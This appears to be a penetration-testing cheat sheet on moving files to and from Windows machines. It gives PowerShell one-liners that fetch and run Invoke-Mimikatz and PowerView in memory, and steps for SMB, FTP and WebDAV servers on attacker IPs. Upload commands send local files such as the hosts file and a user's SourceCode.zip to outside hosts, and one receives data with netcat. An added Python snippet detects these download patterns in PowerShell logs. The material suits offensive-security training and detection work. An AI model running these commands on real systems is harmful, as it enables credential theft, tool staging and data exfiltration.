Windows File Transfer Methods

PowerShell

  • Downloading a file

(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')
  • PowerShell DownloadString - Fileless method

Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or its alias IEX.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')
  • PowerShell Invoke-WebRequest

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
  • Bypassing common Internet Explorer download errors

Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX
  • Another error in PowerShell downloads is related to the SSL/TLS secure channel when the certificate is not trusted. We can bypass this error with the following command:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
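
Seen from the detection side, the fileless method above differs from the disk-based ones in what PowerShell Script Block Logging (event ID 4104) records. The following is an added example, not part of the original page, that classifies logged script text by the transfer primitives listed in this section; the sample blocks and the host files.example.test are constructed.

```python
import re

# Transfer primitives used in the PowerShell section above.
FETCH = {
    "DownloadString": re.compile(r"\.\s*DownloadString\s*\(", re.I),
    "DownloadFile": re.compile(r"\.\s*DownloadFile\s*\(", re.I),
    "Invoke-WebRequest": re.compile(r"(?<![\w-])(?:Invoke-WebRequest|iwr)(?![\w-])", re.I),
}
# Invoke-Expression or its alias IEX, as a call prefix or a pipeline target.
EXEC = re.compile(r"(?<![\w-])(?:IEX|Invoke-Expression)(?![\w-])", re.I)
OUTFILE = re.compile(r"(?<!\w)-OutFile\b", re.I)
URL = re.compile(r"\b(?:https?|ftp)://[^\s'\")]+", re.I)

def classify(script_block):
    """Return (verdict, fetch_methods, urls) for one logged script block."""
    methods = [name for name, rx in FETCH.items() if rx.search(script_block)]
    urls = URL.findall(script_block)
    if not methods:
        return ("no-download", methods, urls)
    writes_disk = "DownloadFile" in methods or bool(OUTFILE.search(script_block))
    if EXEC.search(script_block) and not writes_disk:
        # Fetched text is handed straight to the interpreter: nothing lands on disk.
        return ("in-memory-exec", methods, urls)
    return ("download-to-disk", methods, urls)

# Constructed sample script blocks (not real log data).
SAMPLE_BLOCKS = [
    r"IEX (New-Object Net.WebClient).DownloadString('https://files.example.test/tool.ps1')",
    r"Invoke-WebRequest https://files.example.test/tool.ps1 -UseBasicParsing | iex",
    r"(New-Object Net.WebClient).DownloadFile('ftp://files.example.test/f.txt','C:\Users\Public\f.txt')",
    r"Invoke-WebRequest https://files.example.test/tool.ps1 -OutFile tool.ps1",
    r"Get-ChildItem C:\Users\Public\Downloads",
]

if __name__ == "__main__":
    for block in SAMPLE_BLOCKS:
        verdict, methods, urls = classify(block)
        print(f"{verdict:17} {','.join(methods) or '-':18} {' '.join(urls) or '-'}")
```

Matching is literal: it covers the command forms listed on this page, not obfuscated variants.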

SMB Downloads

  • Create the SMB Server

sudo impacket-smbserver share -smb2support /tmp/smbshare
  • Copy a File from the SMB Server

copy \\192.168.220.133\share\nc.exe
  • Create the SMB Server with a Username and Password

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
  • Mount the SMB Server with Username and Password

net use n: \\192.168.220.133\share /user:test test

FTP Downloads

  • Installing the Python3 FTP server module - pyftpdlib

sudo pip3 install pyftpdlib
  • Setting up a Python3 FTP server

sudo python3 -m pyftpdlib --port 21
  • Transferring files from an FTP server using PowerShell

(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

PowerShell Web Uploads

  • Installing a web server

pip3 install uploadserver
  • Setting up the upload server

python3 -m uploadserver
  • PowerShell script to upload a file to the Python upload server

# Invoke-FileUpload is defined in PSUpload.ps1; that script must be loaded into the session first
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
  • PowerShell Base64 web upload

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
  • We capture the base64 data with Netcat and use the base64 application with the decode option to convert the string into the file.

nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hosts

SMB Uploads

  • Installing the WebDav Python modules

sudo pip3 install wsgidav cheroot
  • Using the WebDav Python module

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous 
  • Connecting to the WebDav share

dir \\192.168.49.128\DavWWWRoot
  • Uploading files using SMB

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

FTP Uploads

sudo python3 -m pyftpdlib --port 21 --write
  • Uploading a file with PowerShell

(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
